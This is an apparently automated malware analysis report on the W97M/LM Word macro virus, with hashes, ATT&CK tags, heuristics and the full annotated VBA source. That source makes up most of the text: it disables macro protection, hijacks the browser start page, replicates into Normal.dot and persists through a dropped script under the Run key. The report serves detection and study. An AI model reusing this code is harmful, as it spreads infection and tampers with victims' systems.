Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b7cae5e9c38f0952…

MALICIOUS

Office (OLE)

47.0 KB Created: 2000-06-13 13:25:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8bd6bf3c4e3c97d45e3fed84f6601068 SHA-1: a0cf98fcf9a66b4d7b5663114f3de2316d46184b SHA-256: b7cae5e9c38f09527d43eba629e1a282404610fa760448a0504a6650cfc60447
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a self-replicating Word macro virus that identifies itself as W97M/LM (the name appears in the UserAddress string, the comment block and the HelpAbout message box of the extracted macro). Document_Open runs automatically when the document is opened, with errors suppressed. It sets the Internet Explorer start page (HKCU) to the author's Geocities URL, overwrites the RegisteredOwner/RegisteredOrganization values under HKLM, greys out the Word command-bar controls used to reach macro security settings, turns off Word's macro virus protection and save/conversion prompts, and disables Ctrl+Break. It then copies its own VBA module source into Normal.dot (or, when already running from Normal, into the active document, which is saved in place as .doc). RemoteInfect drops LM.sys (VBA source) and LM.sys.vbs (a Windows Script Host script that re-injects LM.sys into Normal.dot through Word automation) into C:\Windows\System and registers the .vbs under the HKLM CurrentVersion\Run key for logon persistence. The HKLM "infection marker" value the macro tests is never written by the extracted code, so the payload presumably runs on every open; the Office\9.0\Security check targets Word 2000 even though the file's authoring application is recorded as Word 8.0 (Word 97).

Heuristics 5

  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host — the WScript reference occurs inside the VBScript text that RemoteInfect writes to C:\Windows\System\LM.sys.vbs and registers under the HKLM Run key; the VBA macro itself does not invoke WSH directly.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call — matched inside a string literal (the dropped LM.sys.vbs creates a Word.Application object via WScript.CreateObject); the VBA code itself contains no CreateObject call.
    Matched line in script
        Open "C:\Windows\System\LM.sys.vbs" For Output As #1
            Print #1, "Set MW = WScript.CreateObject(""Word.Application"")"
            Print #1, "MW.Options.VirusProtection = (Rnd * 0)"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
        On Error Resume Next
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.geocities.com/sir_dystyk/index.html — In document text (OLE body); this is also the value the macro writes to the HKCU Internet Explorer "Start Page" key.
    • http://www.geocities.com/sir_ — In document text (OLE body); appears to be a truncated extraction of the URL below.
    • http://www.geocities.com/sir_dystyk/index.html — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3885 bytes
SHA-256: b24d4e7436d62e7dfb15e0c5745824bcfd38590f7ba267385d1d26d2b36c2413
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Infection routine. Document_Open is a Word auto-macro, so this runs as soon
' as the document is opened. Errors are suppressed for the whole procedure:
' a failing step (missing registry value, absent command-bar control, blocked
' VBProject access) does not stop the remaining steps.
Private Sub Document_Open()
    On Error Resume Next
    
    ' "Infection marker" check. With an empty filename, Word's
    ' System.PrivateProfileString reads/writes the registry; the key path is
    ' machine-wide (HKLM). Nothing in the extracted listing ever writes this
    ' value, so the branch below is presumably taken on every open.
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "LM Protection by SiR DySTyK?") <> "Yep !!" Then
        ' Browser hijack: Internet Explorer start page (HKCU) -> author's page.
        ' Same URL as the one listed under "Embedded URL" in this report.
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\", "Start Page") = "http://www.geocities.com/sir_dystyk/index.html"

        ' Tagging: overwrite the machine's registered owner/organisation under
        ' HKLM (requires write access to HKLM).
        With System
            .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "SiR DySTyK"
            .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "LVC"
        End With
        
        ' Defence evasion: disable the Word menu controls a user would use to
        ' inspect macros or change macro security. Office\9.0 is the Office
        ' 2000 hive, so when its Security\Level value exists the
        ' Macro > Security... control is disabled; otherwise the Word 97 style
        ' Tools > Macro, Templates and Add-ins... and Style Gallery... controls.
        ' (Rnd * 0) always evaluates to 0, i.e. False - a trivial obfuscation.
        If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security\", "Level") <> "" Then
            CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0)
        Else
            CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
            CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0)
            CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0)
        End If
        
        ' Turn off Word's macro virus protection warning, the "save changes to
        ' Normal?" prompt and conversion confirmations, so the template write
        ' below is silent.
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
        End With
        
        ' Block Ctrl+Break so the macro cannot be interrupted, and stamp the
        ' Word user identity with the virus name.
        With Application
            .EnableCancelKey = wdCancelDisabled
            .UserName = "SiR DySTyK"
            .UserInitials = "SD"
            .UserAddress = "W97M/LM   >8)"
        End With
        
        ' Replication target: running from the opened document -> infect the
        ' global Normal template; already running from Normal -> infect the
        ' active document.
        If ThisDocument = ActiveDocument Then Set Infect = NormalTemplate Else Set Infect = ActiveDocument
        
        ' Read the virus's own source: every line of the first VBComponent's
        ' code module in this document. Needs programmatic access to the
        ' VBProject object model (later Office versions block this by default;
        ' confirm against the target version).
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        
        ' Replace the target's first module with that source.
        Set Destination = Infect.VBProject.VBComponents.Item(1).CodeModule
        Destination.DeleteLines 1, Destination.CountOfLines
        Destination.AddfromString Vx
        
        ' If a document (not the template) was infected, save it in place as
        ' .doc so the infected copy reaches disk.
        If Infect = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
        
        ' Drop the on-disk copy and the Run-key persistence (see RemoteInfect).
        Call RemoteInfect
End If
' W97M/LM: by SiR DySTyK [© 2000, LVC]
' Should spread under Word2000.
' God made him simple.
' Science made him God. - [ Lawnmower Man   >8) ]
End Sub
' "Signature" payload. A Word macro named after a built-in command
' (HelpAbout) runs in place of Help > About, so this fires when the user
' opens the About dialog: it shows a system-modal message box carrying the
' virus name and then displays the real About dialog.
Private Sub HelpAbout()
    MsgBox "All I have to do is spread.." + Chr$(10) + "   I WILL survive !!   >8)" + Chr$(10) + Chr$(10) + "  -SiR DySTyK-", vbInformation + vbSystemModal, "W97M/LM"
    Dialogs(wdDialogHelpAbout).Show
End Sub
' Dropper and persistence (ATT&CK T1547.001). Writes two files to the
' hard-coded C:\Windows\System path and registers the .vbs under the
' machine-wide Run key:
'   LM.sys     - VBA source copied from this document's first module
'   LM.sys.vbs - Windows Script Host script, run at logon, that re-injects
'                LM.sys into Normal.dot through Word automation
' The hard-coded Win9x-style path and the HKLM write suggest the sample
' expects administrative rights on a Windows 9x era system. Errors are
' suppressed throughout, so a failed file or registry write is silent.
Private Sub RemoteInfect()
    On Error Resume Next
    
    ' Run key: the value NAME is empty, i.e. the key's (Default) value is set
    ' to the dropped script path.
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "") = "C:\Windows\System\LM.sys.vbs"
    
    ' Drop LM.sys. Note the range is CountOfDeclarationLines, not
    ' CountOfLines: only the module's declarations section is written, not
    ' the procedures, so the copy the .vbs later feeds into Normal.dot is
    ' presumably incomplete. Not verified here - confirm dynamically before
    ' relying on it.
    Open "C:\Windows\System\LM.sys" For Output As #1
        Print #1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfDeclarationLines)
    Close #1
    ' Drop LM.sys.vbs. At logon WSH creates a Word.Application instance (the
    ' script never sets Visible), disables the same protection/prompt options
    ' as Document_Open, then wipes Normal.dot's first module and reloads it
    ' from LM.sys. This re-infects Normal even after the document itself is
    ' cleaned; the doubled quotes are VBA string escaping for the .vbs text.
    Open "C:\Windows\System\LM.sys.vbs" For Output As #1
        Print #1, "Set MW = WScript.CreateObject(""Word.Application"")"
        Print #1, "MW.Options.VirusProtection = (Rnd * 0)"
        Print #1, "MW.Options.SaveNormalPrompt = (Rnd * 0)"
        Print #1, "MW.Options.ConfirmConversions = (Rnd * 0)"
        Print #1, "Set LM = MW.NormalTemplate.VBProject.VBComponents(1)"
        Print #1, "LM.CodeModule.DeleteLines 1, LM.CodeModule.CountOfLines"
        Print #1, "LM.CodeModule.AddFromFile (""C:\Windows\System\LM.sys"")"
    Close #1
End Sub